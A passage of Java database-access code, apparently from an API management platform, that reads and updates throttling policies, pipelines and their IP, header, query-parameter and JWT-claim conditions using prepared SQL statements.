globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); policies.add(globalPolicy); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return policies.toArray(new GlobalPolicy[policies.size()]); } /** * Get a particular Global level policy. * * @param policyName name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicy(String policyName) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, policyName); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Get a particular Global level policy given UUID. * * @param uuid name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicyByUUID(String uuid) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY_BY_UUID; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, uuid); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while retrieving global policy by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Retrieves {@link APIPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * <p>This will retrieve complete details about the APIPolicy with all pipelins and conditions.</p> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicy(String policyName, int tenantId) throws APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link APIPolicy} with name <code>uuid</code> * <p>This will retrieve complete details about the APIPolicy with all pipelines and conditions.</p> * * @param uuid uuid of the policy to retrieve from the database * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicyByUUID(String uuid) throws APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicy(String policyName, int tenantId) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>uuid</code> * * @param uuid uuid of the policy to retrieve from the database * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicyByUUID(String uuid) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicy(String policyName, int tenantId) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + policyName + '-' + tenantId, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>uuid</code> * * @param uuid name of the policy to retrieve from the database * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicyByUUID(String uuid) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + uuid, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves list of pipelines for the policy with policy Id: <code>policyId</code> * * @param policyId policy id of the pipelines * @return list of pipelines * @throws APIManagementException */ private ArrayList<Pipeline> getPipelines(int policyId) throws APIManagementException { Connection connection = null; PreparedStatement pipelinesStatement = null; ResultSet resultSet = null; ArrayList<Pipeline> pipelines = new ArrayList<Pipeline>(); try { connection = APIMgtDBUtil.getConnection(); pipelinesStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_PIPELINES_SQL); int unitTime = 0; int quota = 0; int pipelineId = -1; String timeUnit = null; String quotaUnit = null; String description; pipelinesStatement.setInt(1, policyId); resultSet = pipelinesStatement.executeQuery(); while (resultSet.next()) { Pipeline pipeline = new Pipeline(); ArrayList<Condition> conditions = null; QuotaPolicy quotaPolicy = new QuotaPolicy(); quotaPolicy.setType(resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); timeUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_TIME_UNIT); quotaUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_UNIT); unitTime = resultSet.getInt(ThrottlePolicyConstants.COLUMN_UNIT_TIME); quota = resultSet.getInt(ThrottlePolicyConstants.COLUMN_QUOTA); pipelineId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_CONDITION_ID); description = resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(quotaPolicy.getType())) { RequestCountLimit requestCountLimit = new RequestCountLimit(); requestCountLimit.setUnitTime(unitTime); requestCountLimit.setTimeUnit(timeUnit); requestCountLimit.setRequestCount(quota); quotaPolicy.setLimit(requestCountLimit); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(quotaPolicy.getType())) { BandwidthLimit bandwidthLimit = new BandwidthLimit(); bandwidthLimit.setUnitTime(unitTime); bandwidthLimit.setTimeUnit(timeUnit); bandwidthLimit.setDataUnit(quotaUnit); bandwidthLimit.setDataAmount(quota); quotaPolicy.setLimit(bandwidthLimit); } conditions = getConditions(pipelineId); pipeline.setConditions(conditions); pipeline.setQuotaPolicy(quotaPolicy); pipeline.setId(pipelineId); pipeline.setDescription(description); pipelines.add(pipeline); } } catch (SQLException e) { handleException("Failed to get pipelines for policyId: " + policyId, e); } finally { APIMgtDBUtil.closeAllConnections(pipelinesStatement, connection, resultSet); } return pipelines; } /** * Retrieves list of Conditions for a pipeline specified by <code>pipelineId</code> * * @param pipelineId pipeline Id with conditions to retrieve * @return list of Conditions for a pipeline * @throws APIManagementException */ private ArrayList<Condition> getConditions(int pipelineId) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; ArrayList<Condition> conditions = new ArrayList<Condition>(); String startingIP = null; String endingIP = null; String specificIP = null; boolean invert; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_IP_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { startingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_STARTING_IP); endingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_ENDING_IP); specificIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_SPECIFIC_IP); invert = resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_WITHIN_IP_RANGE); if (specificIP != null && !"".equals(specificIP)) { IPCondition ipCondition = new IPCondition(PolicyConstants.IP_SPECIFIC_TYPE); ipCondition.setSpecificIP(specificIP); ipCondition.setInvertCondition(invert); conditions.add(ipCondition); } else if (startingIP != null && !"".equals(startingIP)) { /* Assumes availability of starting ip means ip range is enforced. Therefore availability of ending ip is not checked. */ IPCondition ipRangeCondition = new IPCondition(PolicyConstants.IP_RANGE_TYPE); ipRangeCondition.setStartingIP(startingIP); ipRangeCondition.setEndingIP(endingIP); ipRangeCondition.setInvertCondition(invert); conditions.add(ipRangeCondition); } } setHeaderConditions(pipelineId, conditions); setQueryParameterConditions(pipelineId, conditions); setJWTClaimConditions(pipelineId, conditions); } catch (SQLException e) { handleException("Failed to get conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } return conditions; } /** * Add Header conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setHeaderConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_HEADER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { HeaderCondition headerCondition = new HeaderCondition(); headerCondition.setHeader(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_NAME)); headerCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_VALUE)); headerCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_HEADER_FIELD_MAPPING)); conditions.add(headerCondition); } } catch (SQLException e) { handleException("Failed to get header conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add Query parameter conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setQueryParameterConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_QUERY_PARAMETER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { QueryParameterCondition queryParameterCondition = new QueryParameterCondition(); queryParameterCondition .setParameter(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_NAME)); queryParameterCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_VALUE)); queryParameterCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_PARAM_MAPPING)); conditions.add(queryParameterCondition); } } catch (SQLException e) { handleException("Failed to get query parameter conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add JWT claim conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setJWTClaimConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_JWT_CLAIM_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { JWTClaimsCondition jwtClaimsCondition = new JWTClaimsCondition(); jwtClaimsCondition.setClaimUrl(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_URI)); jwtClaimsCondition.setAttribute(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_ATTRIBUTE)); jwtClaimsCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_CLAIM_MAPPING)); conditions.add(jwtClaimsCondition); } } catch (SQLException e) { handleException("Failed to get jwt claim conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Updates API level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * <p> * Exsisting policy will be deleted and new policy will be inserted to the database * with old POLICY_ID. Uses {@link #updateAPIPolicy(APIPolicy)} * to create new policy. * </p> * * @param policy updated policy object * @throws APIManagementException */ public APIPolicy updateAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement selectStatement = null; PreparedStatement deleteStatement = null; ResultSet resultSet = null; int oldPolicyId = 0; String oldPolicyUUID = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (policy != null) { if (policy.getPolicyName() != null && policy.getTenantId() != -1) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_SQL); selectStatement.setString(1, policy.getPolicyName()); selectStatement.setInt(2, policy.getTenantId()); } else if (policy.getUUID() != null) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_BY_UUID_SQL); selectStatement.setString(1, policy.getUUID()); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } } else { String errorMsg = "Provided Policy to add is null"; log.error(errorMsg); throw new APIManagementException(errorMsg); } // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { oldPolicyId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID); oldPolicyUUID = resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID); } deleteStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL); deleteStatement.setInt(1, policy.getTenantId()); deleteStatement.setString(2, policy.getPolicyName()); deleteStatement.executeUpdate(); policy.setPolicyId(oldPolicyId); if (!StringUtils.isBlank(oldPolicyUUID)) { policy.setUUID(oldPolicyUUID); } updateAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to update api policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); } return policy; } /** * Updates Application level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; if (policy.getTenantId() == -1 || StringUtils.isEmpty(policy.getPolicyName())) { String errorMsg = "Policy object doesn't contain mandatory parameters. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId(); log.error(errorMsg); throw new APIManagementException(errorMsg); } try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); if (hasCustomAttrib) { updateStatement.setBlob(8, new ByteArrayInputStream(policy.getCustomAttributes())); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(9, policy.getPolicyName()); updateStatement.setInt(10, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(9, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(8, policy.getPolicyName()); updateStatement.setInt(9, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(8, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Application Policy: " + policy.toString(), ex); } } handleException( "Failed to update application policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Updates Subscription level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); updateStatement.setInt(8, policy.getRateLimitCount()); updateStatement.setString(9, policy.getRateLimitTimeUnit()); updateStatement.setBoolean(10, policy.isStopOnQuotaReach()); updateStatement.setString(11, policy.getBillingPlan()); if (hasCustomAttrib) { long lengthOfStream = policy.getCustomAttributes().length; updateStatement.setBinaryStream(12, new ByteArrayInputStream(policy.getCustomAttributes()), lengthOfStream); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(13, policy.getPolicyName()); updateStatement.setInt(14, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(13, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(12, policy.getPolicyName()); updateStatement.setInt(13, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(12, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Subscription Policy: " + policy.toString(), ex); } } handleException( "Failed to update subscription policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, 